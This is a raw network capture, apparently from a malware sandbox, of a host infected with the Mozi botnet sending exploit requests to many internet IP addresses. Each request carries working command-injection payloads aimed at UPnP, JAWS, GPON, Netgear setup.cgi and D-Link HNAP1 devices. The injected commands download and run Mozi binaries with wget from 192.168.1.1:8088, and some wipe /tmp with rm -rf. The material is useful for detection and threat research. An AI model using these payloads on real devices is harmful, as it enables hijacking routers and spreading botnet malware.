                                                                                                          Jan 6, 2021 19:32:56.713865995 CET661OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: /
                                                                                                          User-Agent: Hello-World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          20192.168.2.2050336178.88.225.3380
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:29.355088949 CET1212OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                          User-Agent: Hello, world
                                                                                                          Host: 178.88.225.33:80
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                          Connection: keep-alive
                                                                                                          Jan 6, 2021 19:34:29.507900953 CET1213INHTTP/1.1 200 OK


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          21192.168.2.2048822115.160.28.658080
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:37.508892059 CET1249OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                          Host: 127.0.0.1:8080
                                                                                                          Connection: keep-alive
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Accept: */*
                                                                                                          User-Agent: Hello, World
                                                                                                          Content-Length: 118
                                                                                                          Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                                                          Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
                                                                                                          Jan 6, 2021 19:34:37.789091110 CET1249INHTTP/1.1 400 Bad Request
                                                                                                          Date: Wed, 06 Jan 2021 18:34:37 GMT
                                                                                                          Server: Boa/0.94.14rc21
                                                                                                          Accept-Ranges: bytes
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=ISO-8859-1
                                                                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                          Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          22192.168.2.205650282.75.175.4580
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:45.308593988 CET1289OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:34:45.366614103 CET1290INHTTP/1.1 302 Moved Temporarily
                                                                                                          Server: nginx
                                                                                                          Date: Wed, 06 Jan 2021 18:34:45 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 138
                                                                                                          Location: http://192.168.178.12/?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          23192.168.2.2048726113.161.79.23180
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:50.470290899 CET1313OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                          Host: 127.0.0.1:80
                                                                                                          Connection: keep-alive
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Accept: */*
                                                                                                          User-Agent: Hello, World
                                                                                                          Content-Length: 118
                                                                                                          Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                          Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                          Jan 6, 2021 19:34:50.689670086 CET1314INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.15.5 (Ubuntu)
                                                                                                          Date: Wed, 06 Jan 2021 18:34:50 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          Content-Encoding: gzip
                                                                                                          Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 a6 7a a6 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 d0 b6 57 b0 a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]W0
                                                                                                          Jan 6, 2021 19:34:50.689682961 CET1314INHTTP/1.1 400 Bad Request
                                                                                                          Server: nginx/1.15.5 (Ubuntu)
                                                                                                          Date: Wed, 06 Jan 2021 18:34:50 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 166
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 35 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.15.5 (Ubuntu)</center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          24192.168.2.204197215.237.62.5180
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:52.303076982 CET1324OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                          Host: 127.0.0.1:80
                                                                                                          Connection: keep-alive
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Accept: */*
                                                                                                          User-Agent: Hello, World
                                                                                                          Content-Length: 118
                                                                                                          Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                          Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                          Jan 6, 2021 19:34:52.351491928 CET1324INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.19.4
                                                                                                          Date: Wed, 06 Jan 2021 18:34:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 153
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.19.4</center></body></html>
                                                                                                          Jan 6, 2021 19:34:52.351501942 CET1325INHTTP/1.1 400 Bad Request
                                                                                                          Server: nginx/1.19.4
                                                                                                          Date: Wed, 06 Jan 2021 18:34:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 157
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.4</center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          25192.168.2.205417813.249.130.8580
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:59.393141985 CET1358OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                          User-Agent: Hello, world
                                                                                                          Host: 13.249.130.85:80
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                          Connection: keep-alive
                                                                                                          Jan 6, 2021 19:34:59.544140100 CET1359INHTTP/1.1 403 Forbidden
                                                                                                          Server: CloudFront
                                                                                                          Date: Wed, 06 Jan 2021 18:34:59 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 915
                                                                                                          Connection: keep-alive
                                                                                                          X-Cache: Error from cloudfront
                                                                                                          Via: 1.1 7430a54821bbaeddfc77b56ba1b84eae.cloudfront.net (CloudFront)
                                                                                                          X-Amz-Cf-Pop: ORD51-C1
                                                                                                          X-Amz-Cf-Id: gUM0yLe_fEKv8656T9JCwdSLKxMaMPlqOqkpGkjXP6X55_LMBHy7Xw==
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 67 55 4d 30 79 4c 65 5f 66 45 4b 76 38 36 35 36 54 39 4a 43 77 64 53 4c 4b 78 4d 61 4d 50 6c 71 4f 71 6b 70 47 6b 6a 58 50 36 58 35 35 5f 4c 4d 42 48 79 37 58 77 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE></HEAD><BODY><H1>403 ERROR</H1><H2>The request could not be satisfied.</H2><HR noshade size="1px">Bad request.We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.<BR clear="all">If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.<BR clear="all"><HR noshade size="1px"><PRE>Generated by cloudfront (CloudFront)Request ID: gUM0yLe_fEKv8656T9JCwdSLKxMaMPlqOqkpGkjXP6X55_LMBHy7Xw==</PRE><ADDRESS></ADDRESS></BODY></HTML>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          26192.168.2.2041262203.238.166.780
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:35:06.506294012 CET2175OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:35:07.128099918 CET2175OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:35:07.972141981 CET2183OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:35:09.664218903 CET2192OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:35:13.048409939 CET2200OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:35:17.382980108 CET2227OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:35:18.224627972 CET2229OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:35:19.916717052 CET2232OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:35:23.296952963 CET2255OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          3192.168.2.204438871.41.225.7480
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:32:25.400197029 CET399OUTPOST /HNAP1/ HTTP/1.0
                                                                                                          Host: 71.41.225.74:80
                                                                                                          Content-Type: text/xml; charset="utf-8"
                                                                                                          SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
